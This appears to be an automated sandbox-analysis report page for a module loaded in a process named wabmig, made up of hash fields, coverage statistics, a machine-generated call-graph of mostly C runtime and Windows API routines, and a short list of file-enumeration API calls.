                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 205fcf5c8695a4ae41e994fa65b90d64cb7308cfb013c73cf9f307d6bbc29f02
                                                                            • Instruction ID: 024d5bcc5e12728b22430805529cd04e437aec55c93808ef29afedee56896739
                                                                            • Opcode Fuzzy Hash: 205fcf5c8695a4ae41e994fa65b90d64cb7308cfb013c73cf9f307d6bbc29f02
                                                                            • Instruction Fuzzy Hash: 5F919F75A042058FCB05CF59C494AAEFBB1FF48310B24859AE955AB3A1D736FC81CFA0

Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 1.3%
Total number of Nodes: 1661
Total number of Limit Nodes: 5
GetProcAddress 6215->6216 6216->6208 6222 232339cd try_get_first_available_module 6217->6222 6218 232339ea LoadLibraryExW 6220 23233a05 GetLastError 6218->6220 6218->6222 6219 23233a77 6219->6215 6219->6216 6220->6222 6221 23233a60 FreeLibrary 6221->6222 6222->6218 6222->6219 6222->6221 6223 23233a38 LoadLibraryExW 6222->6223 6223->6222 6225 23233a82 try_get_function 5 API calls 6224->6225 6226 23233b0b 6225->6226 6227 23233b24 TlsAlloc 6226->6227 6228 232338f2 6226->6228 6228->6201 6229 23233ba2 6228->6229 6230 23233a82 try_get_function 5 API calls 6229->6230 6231 23233bbc 6230->6231 6232 23233bd7 TlsSetValue 6231->6232 6233 2323390b 6231->6233 6232->6233 6233->6199 6234 2323391b 6233->6234 6235 2323392b 6234->6235 6236 23233925 6234->6236 6235->6201 6238 23233b2c 6236->6238 6239 23233a82 try_get_function 5 API calls 6238->6239 6240 23233b46 6239->6240 6241 23233b5e TlsFree 6240->6241 6242 23233b52 6240->6242 6241->6242 6242->6235 6246 23237470 6243->6246 6244 23232ada _ValidateLocalCookies 5 API calls 6245 232324a3 6244->6245 6245->6144 6245->6180 6246->6244 6248 23233c7f 6247->6248 6249 23233c59 6247->6249 6248->6187 6249->6248 6250 23233c69 FreeLibrary 6249->6250 6250->6249 6252 232324c4 6251->6252 6253 232324c8 6251->6253 6252->6148 6254 23232639 ___scrt_fastfail 4 API calls 6253->6254 6255 232324d5 ___scrt_release_startup_lock 6253->6255 6256 23232559 6254->6256 6255->6148 7266 232367bf 7271 232367f4 7266->7271 7269 232367db 7270 2323571e _free 20 API calls 7270->7269 7272 232367cd 7271->7272 7273 23236806 7271->7273 7272->7269 7272->7270 7274 23236836 7273->7274 7275 2323680b 7273->7275 7274->7272 7282 232371d6 7274->7282 7276 2323637b _abort 20 API calls 7275->7276 7278 23236814 7276->7278 7280 2323571e _free 20 API calls 7278->7280 7279 23236851 7281 2323571e _free 20 API calls 7279->7281 7280->7272 7281->7272 7283 232371e1 7282->7283 7284 23237209 7283->7284 7285 232371fa 7283->7285 7286 23237218 7284->7286 7291 23238a98 7284->7291 7287 23236368 _free 20 
API calls 7285->7287 7298 23238acb 7286->7298 7290 232371ff ___scrt_fastfail 7287->7290 7290->7279 7292 23238aa3 7291->7292 7293 23238ab8 RtlSizeHeap 7291->7293 7294 23236368 _free 20 API calls 7292->7294 7293->7286 7295 23238aa8 7294->7295 7296 232362ac _abort 26 API calls 7295->7296 7297 23238ab3 7296->7297 7297->7286 7299 23238ae3 7298->7299 7300 23238ad8 7298->7300 7302 23238aeb 7299->7302 7308 23238af4 _abort 7299->7308 7310 232356d0 7300->7310 7303 2323571e _free 20 API calls 7302->7303 7306 23238ae0 7303->7306 7304 23238af9 7307 23236368 _free 20 API calls 7304->7307 7305 23238b1e RtlReAllocateHeap 7305->7306 7305->7308 7306->7290 7307->7306 7308->7304 7308->7305 7309 2323474f _abort 7 API calls 7308->7309 7309->7308 7311 2323570e 7310->7311 7315 232356de _abort 7310->7315 7312 23236368 _free 20 API calls 7311->7312 7314 2323570c 7312->7314 7313 232356f9 RtlAllocateHeap 7313->7314 7313->7315 7314->7306 7315->7311 7315->7313 7316 2323474f _abort 7 API calls 7315->7316 7316->7315 7552 23235bff 7560 23235d5c 7552->7560 7554 23235c13 7556 23235b7a _abort 20 API calls 7557 23235c1b 7556->7557 7558 23235c28 7557->7558 7559 23235c2b 11 API calls 7557->7559 7559->7554 7561 23235c45 _abort 5 API calls 7560->7561 7562 23235d83 7561->7562 7563 23235d9b TlsAlloc 7562->7563 7564 23235d8c 7562->7564 7563->7564 7565 23232ada _ValidateLocalCookies 5 API calls 7564->7565 7566 23235c09 7565->7566 7566->7554 7566->7556 6257 2323543d 6258 23235440 6257->6258 6261 232355a8 6258->6261 6272 23237613 6261->6272 6264 232355b8 6266 232355e0 6264->6266 6267 232355c2 IsProcessorFeaturePresent 6264->6267 6308 23234bc1 6266->6308 6269 232355cd 6267->6269 6302 232360e2 6269->6302 6311 23237581 6272->6311 6275 2323766e 6276 2323767a _abort 6275->6276 6277 232376a7 _abort 6276->6277 6278 23235b7a _abort 20 API calls 6276->6278 6284 232376a1 _abort 6276->6284 6292 2323771f 6277->6292 6328 23235671 RtlEnterCriticalSection 6277->6328 6278->6284 6279 232376f3 6280 23236368 _free 20 API calls 
6279->6280 6281 232376f8 6280->6281 6325 232362ac 6281->6325 6284->6277 6284->6279 6285 232376d6 6284->6285 6357 2323bdc9 6285->6357 6289 2323777e 6299 232377a9 6289->6299 6330 23237665 6289->6330 6291 23237776 6293 23234bc1 _abort 28 API calls 6291->6293 6292->6289 6292->6291 6292->6299 6329 232356b9 RtlLeaveCriticalSection 6292->6329 6293->6289 6298 23237665 _abort 38 API calls 6298->6299 6333 2323782e 6299->6333 6300 2323780c 6300->6285 6301 23235af6 _abort 38 API calls 6300->6301 6301->6285 6303 232360fe ___scrt_fastfail 6302->6303 6304 2323612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6303->6304 6307 232361fb ___scrt_fastfail 6304->6307 6305 23232ada _ValidateLocalCookies 5 API calls 6306 23236219 6305->6306 6306->6266 6307->6305 6376 2323499b 6308->6376 6314 23237527 6311->6314 6313 232355ad 6313->6264 6313->6275 6315 23237533 ___DestructExceptionObject 6314->6315 6320 23235671 RtlEnterCriticalSection 6315->6320 6317 23237541 6321 23237575 6317->6321 6319 23237568 _abort 6319->6313 6320->6317 6324 232356b9 RtlLeaveCriticalSection 6321->6324 6323 2323757f 6323->6319 6324->6323 6360 23236231 6325->6360 6327 232362b8 6327->6285 6328->6292 6329->6291 6331 23235af6 _abort 38 API calls 6330->6331 6332 2323766a 6331->6332 6332->6298 6334 23237834 6333->6334 6336 232377fd 6333->6336 6375 232356b9 RtlLeaveCriticalSection 6334->6375 6336->6285 6336->6300 6337 23235af6 GetLastError 6336->6337 6338 23235b12 6337->6338 6339 23235b0c 6337->6339 6341 2323637b _abort 20 API calls 6338->6341 6344 23235b61 SetLastError 6338->6344 6340 23235e08 _abort 11 API calls 6339->6340 6340->6338 6342 23235b24 6341->6342 6343 23235b2c 6342->6343 6345 23235e5e _abort 11 API calls 6342->6345 6346 2323571e _free 20 API calls 6343->6346 6344->6300 6347 23235b41 6345->6347 6348 23235b32 6346->6348 6347->6343 6349 23235b48 6347->6349 6350 23235b6d SetLastError 6348->6350 6351 2323593c _abort 20 API calls 6349->6351 6352 232355a8 _abort 35 API calls 6350->6352 6353 
23235b53 6351->6353 6354 23235b79 6352->6354 6355 2323571e _free 20 API calls 6353->6355 6356 23235b5a 6355->6356 6356->6344 6356->6350 6358 23232ada _ValidateLocalCookies 5 API calls 6357->6358 6359 2323bdd4 6358->6359 6359->6359 6361 23235b7a _abort 20 API calls 6360->6361 6362 23236247 6361->6362 6363 232362a6 6362->6363 6364 23236255 6362->6364 6371 232362bc IsProcessorFeaturePresent 6363->6371 6368 23232ada _ValidateLocalCookies 5 API calls 6364->6368 6366 232362ab 6367 23236231 _abort 26 API calls 6366->6367 6369 232362b8 6367->6369 6370 2323627c 6368->6370 6369->6327 6370->6327 6372 232362c7 6371->6372 6373 232360e2 _abort 8 API calls 6372->6373 6374 232362dc GetCurrentProcess TerminateProcess 6373->6374 6374->6366 6375->6336 6377 232349a7 _abort 6376->6377 6378 232349bf 6377->6378 6398 23234af5 GetModuleHandleW 6377->6398 6407 23235671 RtlEnterCriticalSection 6378->6407 6382 23234a65 6411 23234aa5 6382->6411 6386 23234a3c 6390 23234a54 6386->6390 6394 23234669 _abort 5 API calls 6386->6394 6387 232349c7 6387->6382 6387->6386 6408 2323527a 6387->6408 6388 23234a82 6414 23234ab4 6388->6414 6389 23234aae 6393 2323bdc9 _abort 5 API calls 6389->6393 6395 23234669 _abort 5 API calls 6390->6395 6397 23234ab3 6393->6397 6394->6390 6395->6382 6399 232349b3 6398->6399 6399->6378 6400 23234b39 GetModuleHandleExW 6399->6400 6401 23234b63 GetProcAddress 6400->6401 6405 23234b78 6400->6405 6401->6405 6402 23234b95 6404 23232ada _ValidateLocalCookies 5 API calls 6402->6404 6403 23234b8c FreeLibrary 6403->6402 6406 23234b9f 6404->6406 6405->6402 6405->6403 6406->6378 6407->6387 6422 23235132 6408->6422 6444 232356b9 RtlLeaveCriticalSection 6411->6444 6413 23234a7e 6413->6388 6413->6389 6445 23236025 6414->6445 6417 23234ae2 6420 23234b39 _abort 8 API calls 6417->6420 6418 23234ac2 GetPEB 6418->6417 6419 23234ad2 GetCurrentProcess TerminateProcess 6418->6419 6419->6417 6421 23234aea ExitProcess 6420->6421 6425 232350e1 6422->6425 6424 23235156 6424->6386 6426 232350ed 
___DestructExceptionObject 6425->6426 6433 23235671 RtlEnterCriticalSection 6426->6433 6428 232350fb 6434 2323515a 6428->6434 6432 23235119 _abort 6432->6424 6433->6428 6437 23235182 6434->6437 6438 2323517a 6434->6438 6435 23232ada _ValidateLocalCookies 5 API calls 6436 23235108 6435->6436 6440 23235126 6436->6440 6437->6438 6439 2323571e _free 20 API calls 6437->6439 6438->6435 6439->6438 6443 232356b9 RtlLeaveCriticalSection 6440->6443 6442 23235130 6442->6432 6443->6442 6444->6413 6446 23236040 6445->6446 6447 2323604a 6445->6447 6449 23232ada _ValidateLocalCookies 5 API calls 6446->6449 6448 23235c45 _abort 5 API calls 6447->6448 6448->6446 6450 23234abe 6449->6450 6450->6417 6450->6418 6451 23235303 6454 232350a5 6451->6454 6463 2323502f 6454->6463 6457 2323502f 5 API calls 6458 232350c3 6457->6458 6467 23235000 6458->6467 6461 23235000 20 API calls 6462 232350d9 6461->6462 6464 23235048 6463->6464 6465 23232ada _ValidateLocalCookies 5 API calls 6464->6465 6466 23235069 6465->6466 6466->6457 6468 2323500d 6467->6468 6472 2323502a 6467->6472 6469 23235024 6468->6469 6470 2323571e _free 20 API calls 6468->6470 6471 2323571e _free 20 API calls 6469->6471 6470->6468 6471->6472 6472->6461 6473 23237103 GetCommandLineA GetCommandLineW 6594 2323af43 6595 2323af59 6594->6595 6596 2323af4d 6594->6596 6596->6595 6597 2323af52 CloseHandle 6596->6597 6597->6595 6598 23238640 6601 23238657 6598->6601 6602 23238665 6601->6602 6603 23238679 6601->6603 6604 23236368 _free 20 API calls 6602->6604 6605 23238693 6603->6605 6606 23238681 6603->6606 6607 2323866a 6604->6607 6613 23238652 6605->6613 6614 232354a7 6605->6614 6608 23236368 _free 20 API calls 6606->6608 6610 232362ac _abort 26 API calls 6607->6610 6611 23238686 6608->6611 6610->6613 6612 232362ac _abort 26 API calls 6611->6612 6612->6613 6615 232354c4 6614->6615 6621 232354ba 6614->6621 6616 23235af6 _abort 38 API calls 6615->6616 6615->6621 6617 232354e5 6616->6617 6622 23237a00 6617->6622 6621->6613 6623 23237a13 
6622->6623 6624 232354fe 6622->6624 6623->6624 6630 23237f0f 6623->6630 6626 23237a2d 6624->6626 6627 23237a40 6626->6627 6628 23237a55 6626->6628 6627->6628 6765 23236d7e 6627->6765 6628->6621 6631 23237f1b ___DestructExceptionObject 6630->6631 6632 23235af6 _abort 38 API calls 6631->6632 6633 23237f24 6632->6633 6634 23237f72 _abort 6633->6634 6642 23235671 RtlEnterCriticalSection 6633->6642 6634->6624 6636 23237f42 6643 23237f86 6636->6643 6641 232355a8 _abort 38 API calls 6641->6634 6642->6636 6644 23237f94 __fassign 6643->6644 6646 23237f56 6643->6646 6644->6646 6650 23237cc2 6644->6650 6647 23237f75 6646->6647 6764 232356b9 RtlLeaveCriticalSection 6647->6764 6649 23237f69 6649->6634 6649->6641 6652 23237d42 6650->6652 6653 23237cd8 6650->6653 6654 2323571e _free 20 API calls 6652->6654 6676 23237d90 6652->6676 6653->6652 6656 23237d0b 6653->6656 6660 2323571e _free 20 API calls 6653->6660 6655 23237d64 6654->6655 6658 2323571e _free 20 API calls 6655->6658 6657 23237d2d 6656->6657 6662 2323571e _free 20 API calls 6656->6662 6659 2323571e _free 20 API calls 6657->6659 6661 23237d77 6658->6661 6664 23237d37 6659->6664 6666 23237d00 6660->6666 6663 2323571e _free 20 API calls 6661->6663 6668 23237d22 6662->6668 6669 23237d85 6663->6669 6670 2323571e _free 20 API calls 6664->6670 6665 23237dfe 6671 2323571e _free 20 API calls 6665->6671 6678 232390ba 6666->6678 6667 23237d9e 6667->6665 6677 2323571e 20 API calls _free 6667->6677 6706 232391b8 6668->6706 6674 2323571e _free 20 API calls 6669->6674 6670->6652 6675 23237e04 6671->6675 6674->6676 6675->6646 6718 23237e35 6676->6718 6677->6667 6679 232390cb 6678->6679 6705 232391b4 6678->6705 6680 232390dc 6679->6680 6681 2323571e _free 20 API calls 6679->6681 6682 232390ee 6680->6682 6683 2323571e _free 20 API calls 6680->6683 6681->6680 6684 23239100 6682->6684 6686 2323571e _free 20 API calls 6682->6686 6683->6682 6685 23239112 6684->6685 6687 2323571e _free 20 API calls 6684->6687 6688 23239124 6685->6688 6689 
2323571e _free 20 API calls 6685->6689 6686->6684 6687->6685 6690 2323571e _free 20 API calls 6688->6690 6693 23239136 6688->6693 6689->6688 6690->6693 6691 23239148 6692 2323915a 6691->6692 6695 2323571e _free 20 API calls 6691->6695 6696 2323916c 6692->6696 6697 2323571e _free 20 API calls 6692->6697 6693->6691 6694 2323571e _free 20 API calls 6693->6694 6694->6691 6695->6692 6698 2323917e 6696->6698 6699 2323571e _free 20 API calls 6696->6699 6697->6696 6700 23239190 6698->6700 6702 2323571e _free 20 API calls 6698->6702 6699->6698 6701 232391a2 6700->6701 6703 2323571e _free 20 API calls 6700->6703 6704 2323571e _free 20 API calls 6701->6704 6701->6705 6702->6700 6703->6701 6704->6705 6705->6656 6707 232391c5 6706->6707 6717 2323921d 6706->6717 6708 2323571e _free 20 API calls 6707->6708 6709 232391d5 6707->6709 6708->6709 6710 232391e7 6709->6710 6712 2323571e _free 20 API calls 6709->6712 6711 232391f9 6710->6711 6713 2323571e _free 20 API calls 6710->6713 6714 2323920b 6711->6714 6715 2323571e _free 20 API calls 6711->6715 6712->6710 6713->6711 6716 2323571e _free 20 API calls 6714->6716 6714->6717 6715->6714 6716->6717 6717->6657 6719 23237e60 6718->6719 6720 23237e42 6718->6720 6719->6667 6720->6719 6724 2323925d 6720->6724 6723 2323571e _free 20 API calls 6723->6719 6725 23237e5a 6724->6725 6726 2323926e 6724->6726 6725->6723 6760 23239221 6726->6760 6729 23239221 __fassign 20 API calls 6730 23239281 6729->6730 6731 23239221 __fassign 20 API calls 6730->6731 6732 2323928c 6731->6732 6733 23239221 __fassign 20 API calls 6732->6733 6734 23239297 6733->6734 6735 23239221 __fassign 20 API calls 6734->6735 6736 232392a5 6735->6736 6737 2323571e _free 20 API calls 6736->6737 6738 232392b0 6737->6738 6739 2323571e _free 20 API calls 6738->6739 6740 232392bb 6739->6740 6741 2323571e _free 20 API calls 6740->6741 6742 232392c6 6741->6742 6743 23239221 __fassign 20 API calls 6742->6743 6744 232392d4 6743->6744 6745 23239221 __fassign 20 API calls 6744->6745 6746 
232392e2 6745->6746 6747 23239221 __fassign 20 API calls 6746->6747 6748 232392f3 6747->6748 6749 23239221 __fassign 20 API calls 6748->6749 6750 23239301 6749->6750 6751 23239221 __fassign 20 API calls 6750->6751 6752 2323930f 6751->6752 6753 2323571e _free 20 API calls 6752->6753 6754 2323931a 6753->6754 6755 2323571e _free 20 API calls 6754->6755 6756 23239325 6755->6756 6757 2323571e _free 20 API calls 6756->6757 6758 23239330 6757->6758 6759 2323571e _free 20 API calls 6758->6759 6759->6725 6761 23239258 6760->6761 6762 23239248 6760->6762 6761->6729 6762->6761 6763 2323571e _free 20 API calls 6762->6763 6763->6762 6764->6649 6766 23236d8a ___DestructExceptionObject 6765->6766 6767 23235af6 _abort 38 API calls 6766->6767 6769 23236d94 6767->6769 6771 23236e18 _abort 6769->6771 6772 232355a8 _abort 38 API calls 6769->6772 6773 2323571e _free 20 API calls 6769->6773 6774 23235671 RtlEnterCriticalSection 6769->6774 6775 23236e0f 6769->6775 6771->6628 6772->6769 6773->6769 6774->6769 6778 232356b9 RtlLeaveCriticalSection 6775->6778 6777 23236e16 6777->6769 6778->6777 7317 23237a80 7318 23237a8d 7317->7318 7319 2323637b _abort 20 API calls 7318->7319 7320 23237aa7 7319->7320 7321 2323571e _free 20 API calls 7320->7321 7322 23237ab3 7321->7322 7323 2323637b _abort 20 API calls 7322->7323 7327 23237ad9 7322->7327 7324 23237acd 7323->7324 7326 2323571e _free 20 API calls 7324->7326 7325 23235eb7 11 API calls 7325->7327 7326->7327 7327->7325 7328 23237ae5 7327->7328 7567 23237bc7 7568 23237bd3 ___DestructExceptionObject 7567->7568 7569 23237c0a _abort 7568->7569 7575 23235671 RtlEnterCriticalSection 7568->7575 7571 23237be7 7572 23237f86 __fassign 20 API calls 7571->7572 7573 23237bf7 7572->7573 7576 23237c10 7573->7576 7575->7571 7579 232356b9 RtlLeaveCriticalSection 7576->7579 7578 23237c17 7578->7569 7579->7578 7580 2323a1c6 IsProcessorFeaturePresent 6779 2323a945 6781 2323a96d 6779->6781 6780 2323a9a5 6781->6780 6782 2323a997 6781->6782 6783 2323a99e 6781->6783 
6788 2323aa17 6782->6788 6792 2323aa00 6783->6792 6789 2323aa20 6788->6789 6796 2323b19b 6789->6796 6793 2323aa20 6792->6793 6794 2323b19b __startOneArgErrorHandling 21 API calls 6793->6794 6795 2323a9a3 6794->6795 6797 2323b1da __startOneArgErrorHandling 6796->6797 6802 2323b25c __startOneArgErrorHandling 6797->6802 6806 2323b59e 6797->6806 6799 2323b286 6800 2323b8b2 __startOneArgErrorHandling 20 API calls 6799->6800 6801 2323b292 6799->6801 6800->6801 6803 23232ada _ValidateLocalCookies 5 API calls 6801->6803 6802->6799 6804 232378a3 __startOneArgErrorHandling 5 API calls 6802->6804 6805 2323a99c 6803->6805 6804->6799 6807 2323b5c1 __raise_exc RaiseException 6806->6807 6808 2323b5bc 6807->6808 6808->6802 6809 23232049 6811 23232055 ___DestructExceptionObject 6809->6811 6810 2323205e 6811->6810 6812 232320d3 6811->6812 6813 2323207d 6811->6813 6814 23232639 ___scrt_fastfail 4 API calls 6812->6814 6823 2323244c 6813->6823 6816 232320da 6814->6816 6817 23232082 6832 23232308 6817->6832 6819 23232087 __RTC_Initialize 6835 232320c4 6819->6835 6821 2323209f 6838 2323260b 6821->6838 6824 23232451 ___scrt_release_startup_lock 6823->6824 6825 23232455 6824->6825 6828 23232461 6824->6828 6826 2323527a _abort 20 API calls 6825->6826 6827 2323245f 6826->6827 6827->6817 6829 2323246e 6828->6829 6830 2323499b _abort 28 API calls 6828->6830 6829->6817 6831 23234bbd 6830->6831 6831->6817 6844 232334c7 RtlInterlockedFlushSList 6832->6844 6834 23232312 6834->6819 6846 2323246f 6835->6846 6837 232320c9 ___scrt_release_startup_lock 6837->6821 6839 23232617 6838->6839 6843 2323262d 6839->6843 6865 232353ed 6839->6865 6842 23233529 ___vcrt_uninitialize 8 API calls 6842->6843 6843->6810 6845 232334d7 6844->6845 6845->6834 6851 232353ff 6846->6851 6849 2323391b ___vcrt_uninitialize_ptd 6 API calls 6850 2323354d 6849->6850 6850->6837 6854 23235c2b 6851->6854 6855 23232476 6854->6855 6856 23235c35 6854->6856 6855->6849 6858 23235db2 6856->6858 6859 23235c45 _abort 5 API calls 6858->6859 
6860 23235dd9 6859->6860 6861 23235df1 TlsFree 6860->6861 6864 23235de5 6860->6864 6861->6864 6862 23232ada _ValidateLocalCookies 5 API calls 6863 23235e02 6862->6863 6863->6855 6864->6862 6868 232374da 6865->6868 6870 232374f3 6868->6870 6869 23232ada _ValidateLocalCookies 5 API calls 6871 23232625 6869->6871 6870->6869 6871->6842 7333 23238a89 7336 23236d60 7333->7336 7337 23236d72 7336->7337 7338 23236d69 7336->7338 7340 23236c5f 7338->7340 7341 23235af6 _abort 38 API calls 7340->7341 7342 23236c6c 7341->7342 7343 23236d7e __fassign 38 API calls 7342->7343 7344 23236c74 7343->7344 7360 232369f3 7344->7360 7347 23236c8b 7347->7337 7348 232356d0 21 API calls 7349 23236c9c 7348->7349 7350 23236cce 7349->7350 7367 23236e20 7349->7367 7352 2323571e _free 20 API calls 7350->7352 7352->7347 7354 23236cc9 7355 23236368 _free 20 API calls 7354->7355 7355->7350 7356 23236d12 7356->7350 7377 232368c9 7356->7377 7357 23236ce6 7357->7356 7358 2323571e _free 20 API calls 7357->7358 7358->7356 7361 232354a7 __fassign 38 API calls 7360->7361 7362 23236a05 7361->7362 7363 23236a26 7362->7363 7364 23236a14 GetOEMCP 7362->7364 7365 23236a2b GetACP 7363->7365 7366 23236a3d 7363->7366 7364->7366 7365->7366 7366->7347 7366->7348 7368 232369f3 40 API calls 7367->7368 7369 23236e3f 7368->7369 7372 23236e90 IsValidCodePage 7369->7372 7374 23236e46 7369->7374 7376 23236eb5 ___scrt_fastfail 7369->7376 7370 23232ada _ValidateLocalCookies 5 API calls 7371 23236cc1 7370->7371 7371->7354 7371->7357 7373 23236ea2 GetCPInfo 7372->7373 7372->7374 7373->7374 7373->7376 7374->7370 7380 23236acb GetCPInfo 7376->7380 7453 23236886 7377->7453 7379 232368ed 7379->7350 7381 23236baf 7380->7381 7386 23236b05 7380->7386 7383 23232ada _ValidateLocalCookies 5 API calls 7381->7383 7385 23236c5b 7383->7385 7385->7374 7390 232386e4 7386->7390 7389 23238a3e 43 API calls 7389->7381 7391 232354a7 __fassign 38 API calls 7390->7391 7393 23238704 MultiByteToWideChar 7391->7393 7394 23238742 7393->7394 7395 232387da 
7393->7395 7397 232356d0 21 API calls 7394->7397 7400 23238763 ___scrt_fastfail 7394->7400 7396 23232ada _ValidateLocalCookies 5 API calls 7395->7396 7398 23236b66 7396->7398 7397->7400 7404 23238a3e 7398->7404 7399 232387d4 7409 23238801 7399->7409 7400->7399 7402 232387a8 MultiByteToWideChar 7400->7402 7402->7399 7403 232387c4 GetStringTypeW 7402->7403 7403->7399 7405 232354a7 __fassign 38 API calls 7404->7405 7406 23238a51 7405->7406 7413 23238821 7406->7413 7410 2323881e 7409->7410 7411 2323880d 7409->7411 7410->7395 7411->7410 7412 2323571e _free 20 API calls 7411->7412 7412->7410 7414 2323883c 7413->7414 7415 23238862 MultiByteToWideChar 7414->7415 7416 2323888c 7415->7416 7425 23238a16 7415->7425 7419 232356d0 21 API calls 7416->7419 7421 232388ad 7416->7421 7417 23232ada _ValidateLocalCookies 5 API calls 7418 23236b87 7417->7418 7418->7389 7419->7421 7420 232388f6 MultiByteToWideChar 7422 2323890f 7420->7422 7436 23238962 7420->7436 7421->7420 7421->7436 7440 23235f19 7422->7440 7424 23238801 __freea 20 API calls 7424->7425 7425->7417 7427 23238971 7429 232356d0 21 API calls 7427->7429 7434 23238992 7427->7434 7428 23238939 7431 23235f19 11 API calls 7428->7431 7428->7436 7429->7434 7430 23238a07 7433 23238801 __freea 20 API calls 7430->7433 7431->7436 7432 23235f19 11 API calls 7435 232389e6 7432->7435 7433->7436 7434->7430 7434->7432 7435->7430 7437 232389f5 WideCharToMultiByte 7435->7437 7436->7424 7437->7430 7438 23238a35 7437->7438 7439 23238801 __freea 20 API calls 7438->7439 7439->7436 7441 23235c45 _abort 5 API calls 7440->7441 7442 23235f40 7441->7442 7445 23235f49 7442->7445 7448 23235fa1 7442->7448 7446 23232ada _ValidateLocalCookies 5 API calls 7445->7446 7447 23235f9b 7446->7447 7447->7427 7447->7428 7447->7436 7449 23235c45 _abort 5 API calls 7448->7449 7450 23235fc8 7449->7450 7451 23232ada _ValidateLocalCookies 5 API calls 7450->7451 7452 23235f89 LCMapStringW 7451->7452 7452->7445 7454 23236892 ___DestructExceptionObject 7453->7454 7461 
23235671 RtlEnterCriticalSection 7454->7461 7456 2323689c 7462 232368f1 7456->7462 7460 232368b5 _abort 7460->7379 7461->7456 7474 23237011 7462->7474 7464 2323693f 7465 23237011 26 API calls 7464->7465 7466 2323695b 7465->7466 7467 23237011 26 API calls 7466->7467 7468 23236979 7467->7468 7469 232368a9 7468->7469 7470 2323571e _free 20 API calls 7468->7470 7471 232368bd 7469->7471 7470->7469 7488 232356b9 RtlLeaveCriticalSection 7471->7488 7473 232368c7 7473->7460 7475 23237022 7474->7475 7479 2323701e 7474->7479 7476 23237029 7475->7476 7481 2323703c ___scrt_fastfail 7475->7481 7477 23236368 _free 20 API calls 7476->7477 7478 2323702e 7477->7478 7480 232362ac _abort 26 API calls 7478->7480 7479->7464 7480->7479 7481->7479 7482 23237073 7481->7482 7483 2323706a 7481->7483 7482->7479 7485 23236368 _free 20 API calls 7482->7485 7484 23236368 _free 20 API calls 7483->7484 7486 2323706f 7484->7486 7485->7486 7487 232362ac _abort 26 API calls 7486->7487 7487->7479 7488->7473 6872 23235348 6873 23233529 ___vcrt_uninitialize 8 API calls 6872->6873 6874 2323534f 6873->6874 6875 23237b48 6885 23238ebf 6875->6885 6879 23237b55 6898 2323907c 6879->6898 6882 23237b7f 6883 2323571e _free 20 API calls 6882->6883 6884 23237b8a 6883->6884 6902 23238ec8 6885->6902 6887 23237b50 6888 23238fdc 6887->6888 6889 23238fe8 ___DestructExceptionObject 6888->6889 6922 23235671 RtlEnterCriticalSection 6889->6922 6891 2323905e 6936 23239073 6891->6936 6893 23238ff3 6893->6891 6895 23239032 RtlDeleteCriticalSection 6893->6895 6923 2323a09c 6893->6923 6894 2323906a _abort 6894->6879 6896 2323571e _free 20 API calls 6895->6896 6896->6893 6899 23239092 6898->6899 6900 23237b64 RtlDeleteCriticalSection 6898->6900 6899->6900 6901 2323571e _free 20 API calls 6899->6901 6900->6879 6900->6882 6901->6900 6903 23238ed4 ___DestructExceptionObject 6902->6903 6912 23235671 RtlEnterCriticalSection 6903->6912 6905 23238f77 6917 23238f97 6905->6917 6906 23238ee3 6906->6905 6911 23238e78 66 API calls 
6906->6911 6913 23237b94 RtlEnterCriticalSection 6906->6913 6914 23238f6d 6906->6914 6909 23238f83 _abort 6909->6887 6911->6906 6912->6906 6913->6906 6920 23237ba8 RtlLeaveCriticalSection 6914->6920 6916 23238f75 6916->6906 6921 232356b9 RtlLeaveCriticalSection 6917->6921 6919 23238f9e 6919->6909 6920->6916 6921->6919 6922->6893 6924 2323a0a8 ___DestructExceptionObject 6923->6924 6925 2323a0b9 6924->6925 6926 2323a0ce 6924->6926 6927 23236368 _free 20 API calls 6925->6927 6933 2323a0c9 _abort 6926->6933 6939 23237b94 RtlEnterCriticalSection 6926->6939 6929 2323a0be 6927->6929 6931 232362ac _abort 26 API calls 6929->6931 6930 2323a0ea 6940 2323a026 6930->6940 6931->6933 6933->6893 6934 2323a0f5 6956 2323a112 6934->6956 7204 232356b9 RtlLeaveCriticalSection 6936->7204 6938 2323907a 6938->6894 6939->6930 6941 2323a033 6940->6941 6942 2323a048 6940->6942 6943 23236368 _free 20 API calls 6941->6943 6947 2323a043 6942->6947 6959 23238e12 6942->6959 6944 2323a038 6943->6944 6946 232362ac _abort 26 API calls 6944->6946 6946->6947 6947->6934 6949 2323907c 20 API calls 6950 2323a064 6949->6950 6965 23237a5a 6950->6965 6952 2323a06a 6972 2323adce 6952->6972 6955 2323571e _free 20 API calls 6955->6947 7203 23237ba8 RtlLeaveCriticalSection 6956->7203 6958 2323a11a 6958->6933 6960 23238e26 6959->6960 6961 23238e2a 6959->6961 6960->6949 6961->6960 6962 23237a5a 26 API calls 6961->6962 6963 23238e4a 6962->6963 6987 23239a22 6963->6987 6966 23237a66 6965->6966 6967 23237a7b 6965->6967 6968 23236368 _free 20 API calls 6966->6968 6967->6952 6969 23237a6b 6968->6969 6970 232362ac _abort 26 API calls 6969->6970 6971 23237a76 6970->6971 6971->6952 6973 2323adf2 6972->6973 6974 2323addd 6972->6974 6976 2323ae2d 6973->6976 6980 2323ae19 6973->6980 6975 23236355 __dosmaperr 20 API calls 6974->6975 6977 2323ade2 6975->6977 6978 23236355 __dosmaperr 20 API calls 6976->6978 6979 23236368 _free 20 API calls 6977->6979 6981 2323ae32 6978->6981 6985 2323a070 6979->6985 7160 2323ada6 6980->7160 
[Control-flow graph edge list for the module at offset 23230000 (snapshot hcaresult_12_2_23230000_wabmig.jbxd): basic-block addresses, call edges and per-function API-call counts; the rendered graph is not recoverable from the page]

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23231137
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231151
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323115C
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323116D
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323117C
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231193
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 232311D0
                                                                            • FindClose.KERNEL32(00000000), ref: 232311DB
                                                                            Memory Dump Source
